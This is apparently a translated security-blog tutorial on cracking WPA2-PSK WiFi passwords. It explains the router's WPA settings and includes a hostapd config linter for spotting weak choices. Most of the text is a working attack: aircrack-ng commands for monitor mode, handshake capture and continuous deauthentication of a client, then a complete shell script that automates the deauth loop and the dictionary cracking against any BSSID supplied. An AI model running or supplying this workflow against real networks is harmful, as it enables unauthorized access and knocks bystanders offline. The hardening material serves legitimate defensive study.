WiFi wireless penetration with the most basic method
WPA/WPA2: WPA/WPA2 is a security protocol (not merely a cipher) and is considerably stronger than WEP. With this security type the router hands authentication to a RADIUS server (802.1X/EAP), and each client's WPA or WPA2 session keys are derived from that exchange. Because a dedicated authentication server is costly and complex to set up, this type is not recommended for ordinary home users.
WPA-PSK/WPA2-PSK: WPA-PSK/WPA2-PSK is the simplified, pre-shared-key form of WPA/WPA2. It is reasonably secure and easy to configure, which suits home users and small businesses, but its whole strength rests on the passphrase: anyone who captures a client's 4-way handshake can test passphrase guesses offline, which is exactly what the procedure below does.
Detailed settings include:
Authentication Type: selects the security format used: Automatic, WPA-PSK, or WPA2-PSK.
Automatic: the router accepts WPA-PSK or WPA2-PSK according to what the client requests, so a client may still negotiate the older WPA.
Encryption Algorithm: selects the cipher used to encrypt wireless data: Automatic, TKIP, or AES. The default is Automatic, in which the router negotiates TKIP or AES per client. Note that 11N (802.11n) mode does not support TKIP, and TKIP is deprecated in any case; choose AES (CCMP) explicitly.
PSK Passphrase: the pre-shared key for WPA-PSK/WPA2-PSK. It is 8-63 ASCII characters, or the raw 256-bit PSK written as 64 hexadecimal characters (the router's help text says 8-64 hex, but a raw PSK is exactly 64 hex digits).
Group Key Update Period: how often, in seconds, the broadcast/group key (GTK) is rotated. The minimum is 30; a value of 0 disables rotation, so the group key never changes.
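The settings above, written out as a hostapd configuration so the weak and corrected choices can be compared side by side. This is an added example, not part of the original article: weak_conf() keeps WPA (v1) and TKIP negotiable, uses a 7-character passphrase and never rotates the group key; strong_conf() is the corrected profile; check_wpa_conf() reads a config on stdin and prints one line per weak setting. All three names, the SSID and the passphrase are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original article): the router's WPA settings as
# hostapd options, plus a small linter for the weak choices. Assumes hostapd;
# SSID, interface and passphrase values are made up.

# Weak profile: WPA v1 still offered (wpa=3), TKIP allowed, passphrase too short,
# group key never rotated. hostapd would actually refuse the 7-char passphrase.
weak_conf() {
cat <<'EOF'
interface=wlan0
ssid=HomeAP
hw_mode=g
channel=6
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
wpa_passphrase=abc1234
wpa_group_rekey=0
EOF
}

# Corrected profile: WPA2 only, CCMP (AES) only, long random passphrase,
# group key rotated every 600 seconds.
strong_conf() {
cat <<'EOF'
interface=wlan0
ssid=HomeAP
hw_mode=g
channel=6
ieee80211n=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=Vq7!rT2m#LpX9bZ4wQs8nH3
wpa_group_rekey=600
EOF
}

# Read a hostapd config on stdin; print one line per weak setting found.
check_wpa_conf() {
    awk '
        BEGIN { FS = "=" }
        /^[ \t]*#/ || NF < 2 { next }                    # skip comments and blank lines
        { key = $1; val = $0; sub(/^[^=]*=/, "", val) }  # value may itself contain "="
        key == "wpa" && val != "2" {
            print "wpa=" val ": WPA (v1) still negotiable; use wpa=2 so only WPA2 is offered" }
        (key == "wpa_pairwise" || key == "rsn_pairwise") && val ~ /TKIP/ {
            print key "=" val ": TKIP allowed; use CCMP (AES) only, 802.11n rates do not support TKIP" }
        key == "wpa_passphrase" && (length(val) < 8 || length(val) > 63) {
            print "wpa_passphrase: must be 8-63 ASCII characters (hostapd refuses to start otherwise)" }
        key == "wpa_group_rekey" && val == "0" {
            print "wpa_group_rekey=0: the group key is never rotated" }
    '
}
```

Usage: `weak_conf | check_wpa_conf` prints five findings (wpa=3, TKIP in both pairwise lines, the short passphrase and the disabled rekey); `strong_conf | check_wpa_conf` prints nothing. Run the linter against a real /etc/hostapd/hostapd.conf with `check_wpa_conf < /etc/hostapd/hostapd.conf`.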
Using Aircrack-ng to capture WPA2-PSK handshake packets:
Main steps:
Set the wireless card to monitor mode:
airmon-ng start wlan0
Scan for nearby WPA2-PSK encrypted wireless signals:
airodump-ng wlan0mon
Open a new terminal and capture the handshake packets:
airodump-ng -c [num] -w wpa2 wlan0mon
(-c fixes the channel.) While waiting, run a deauthentication (DeAuth) attack so the client drops off and reconnects; the reconnection produces the 4-way handshake, which airodump-ng records:
aireplay-ng -0 5 -a BSSID -c STATION wlan0mon
(-0 5 sends 5 deauth bursts)
To deauth continuously until you stop it with Ctrl-C, use: aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
Start the operation. I am using the TL-WN722N network card (note: only v1 of this adapter, with the Atheros AR9271 chipset, supports monitor mode and injection with the stock Linux driver; v2/v3 use a Realtek RTL8188EUS and need an out-of-tree driver). Now I need to attach the USB adapter to the virtual machine. Once it is attached, running ifconfig shows the wlan0 interface. Then I run airmon-ng start wlan0 to put it into monitor mode, which creates wlan0mon.
In the airodump-ng listing, CH is the channel. Lock onto the target and capture its handshake with: airodump-ng -c <channel> --bssid <AP MAC> -w <prefix> wlan0mon
Parameters: -c sets the channel; --bssid is the MAC address (BSSID) of the target AP, not its SSID; -w <prefix> names the output files (for example -w test produces test-01.cap). Do not add --ivs here: it writes a reduced IV-only file meant for WEP cracking, and the WPA handshake needs the full .cap with the EAPOL frames.
Force the client to disconnect: aireplay-ng -0 0 -a <AP MAC> -c <client MAC> wlan0mon
For example: aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon
Start the attack. If aireplay-ng reports that wlan0mon is on a different channel from the AP, the card is not sitting on the AP's channel (airodump-ng is still hopping because it was started without -c, or the wrong channel was given). Start airodump-ng with -c <channel> first, or set the channel with iwconfig wlan0mon channel <channel>, then rerun the command until it succeeds.
When the handshake has been captured, airodump-ng prints WPA handshake: <BSSID> in the top-right corner of its header, as shown in the figure.
Now crack the passphrase by running aircrack-ng on the capture file with a wordlist.
Use a good dictionary. When a candidate matches, aircrack-ng prints KEY FOUND! with the passphrase. Each candidate costs a 4096-iteration PBKDF2-HMAC-SHA1 derivation, so a large dictionary takes time, and a long random passphrase will simply not be in any dictionary.
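The whole procedure (monitor mode, channel-locked capture, deauth, handshake check, dictionary attack) wired into one script, as an added example that is not part of the original article. BSSID, client MAC, channel and wordlist are supplied by the caller; the helper names (is_mac, is_channel, filter_wpa_wordlist, handshake_present, capture_handshake) and the default wordlist path are this script's own assumptions. It also filters the dictionary down to the 8-63 printable ASCII characters a WPA-PSK passphrase can actually have, which the page states but the manual steps do not enforce.

```shell
#!/bin/sh
# Added example (not from the original article): airmon-ng / airodump-ng /
# aireplay-ng / aircrack-ng chained into one run. Helper names and the default
# wordlist path are assumptions. Only run against an AP you are authorised to test.
set -u

IFACE=${IFACE:-wlan0}        # physical card; airmon-ng turns it into ${IFACE}mon
MON="${IFACE}mon"

# A BSSID or client MAC looks like F4:83:CD:F6:15:72 (upper or lower case hex).
is_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Channel numbers are plain integers (1-14 on 2.4 GHz, up to 165 on 5 GHz).
is_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 165 ]
}

# WPA-PSK passphrases are 8-63 printable ASCII characters; drop everything else
# from the dictionary (stdin -> stdout) so aircrack-ng spends no time on it.
filter_wpa_wordlist() {
    awk 'length($0) >= 8 && length($0) <= 63 && $0 ~ /^[ -~]+$/'
}

# Run without a wordlist, aircrack-ng lists each BSSID in the capture with its
# handshake count, e.g. "WPA (1 handshake)"; grep for a non-zero count.
handshake_present() {           # $1 = capture file, $2 = BSSID
    [ -s "$1" ] || return 1
    aircrack-ng "$1" </dev/null 2>/dev/null | grep -iq "$2.*WPA ([1-9][0-9]* handshake"
}

# Lock airodump-ng to the AP's channel (so the deauth goes out on the right one),
# write a full .cap (no --ivs: the EAPOL frames are needed), deauth the client in
# bursts of 5 and stop as soon as the handshake is in the file.
capture_handshake() {           # $1 = BSSID, $2 = client MAC, $3 = channel, $4 = output prefix
    airodump-ng -c "$3" --bssid "$1" -w "$4" "$MON" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3                     # let airodump-ng settle on the channel first
    n=0
    while [ "$n" -lt 12 ]; do
        aireplay-ng -0 5 -a "$1" -c "$2" "$MON" >/dev/null 2>&1
        sleep 5
        if handshake_present "$4-01.cap" "$1"; then
            kill "$dump_pid"
            return 0
        fi
        n=$((n + 1))
    done
    kill "$dump_pid"
    return 1
}

main() {
    [ "$#" -ge 3 ] || { echo "usage: $0 BSSID STATION CHANNEL [WORDLIST]" >&2; return 2; }
    is_mac "$1" && is_mac "$2" && is_channel "$3" || { echo "bad BSSID, STATION or CHANNEL" >&2; return 2; }
    wordlist=${4:-/usr/share/wordlists/rockyou.txt}   # assumed path; adjust to your box
    prefix="wpa2-$(date +%s)"   # fresh prefix so airodump-ng writes <prefix>-01.cap, not -02
    airmon-ng check kill >/dev/null   # stop NetworkManager/wpa_supplicant fighting over the card
    airmon-ng start "$IFACE" >/dev/null
    if capture_handshake "$1" "$2" "$3" "$prefix"; then
        filter_wpa_wordlist < "$wordlist" > "$prefix.dict"
        aircrack-ng -w "$prefix.dict" -b "$1" "$prefix-01.cap"
    else
        echo "no handshake captured; check the channel and that the client is active" >&2
        airmon-ng stop "$MON" >/dev/null
        return 1
    fi
    airmon-ng stop "$MON" >/dev/null
}

# Only run the workflow when invoked with arguments; sourcing the file just defines the helpers.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Usage with the MAC addresses from the walkthrough above: `IFACE=wlan0 sh wpa_capture.sh F4:83:CD:F6:15:72 66:F6:84:88:3C:F1 6 /path/to/wordlist`. The deauth loop gives up after twelve bursts; if it does, the usual causes are the channel being wrong or the client being idle, exactly the failure the manual steps above hit.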
Disclaimer: The content shared on this public account is only for technical discussions among cybersecurity enthusiasts. It is prohibited to use it for illegal purposes. All penetration testing must be authorized. Otherwise, you will be responsible for the consequences. This public account and the original author do not bear any corresponding liability.